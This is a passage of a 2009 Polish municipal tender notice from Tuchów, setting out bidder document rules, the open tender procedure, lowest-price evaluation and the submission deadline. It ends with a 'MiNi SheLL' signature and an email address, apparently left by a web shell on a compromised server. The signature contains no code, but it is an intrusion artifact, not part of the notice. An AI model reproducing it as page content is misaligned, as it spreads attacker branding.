Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.

Dokumenty, o których mowa powyżej należy złożyć w formie oryginału, odpisu, wypisu lub kopii, przetłumaczone na język polski, poświadczonych przez polskie placówki konsularne, stosownie do obowiązujących przepisów.

Dokumenty sporządzone w języku obcym, inne niż określone   powyżej  należy składać wraz z tłumaczeniem na język polski, sporządzonym przez tłumacza przysięgłego. 

Ocena  spełnienia  warunków  wymaganych  od  wykonawców  zostanie  dokonana  wg.  formuły /spełnia - nie spełnia/	 

Nie  spełnienie  chociażby  jednego  warunku  w  pkt.  18  i  19  SIWZ  będzie  skutkować   wykluczeniem  wykonawcy i odrzuceniem  oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.tuchow.BIP Tuchow/Zamówienia  publiczne+ogłoszenia/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tuchowie, 33 - 170 Tuchów ul. Rynek 1, pokój nr 1
Cena  materiałów  przetargowych  wynosi  50,00 złotych - wersja papierowa u Zamawiającego.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2009 godzina 10:00, miejsce: Urząd Miejski w Tuchowie, 33 - 170 Tuchów ul. Rynek 1, pokój nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com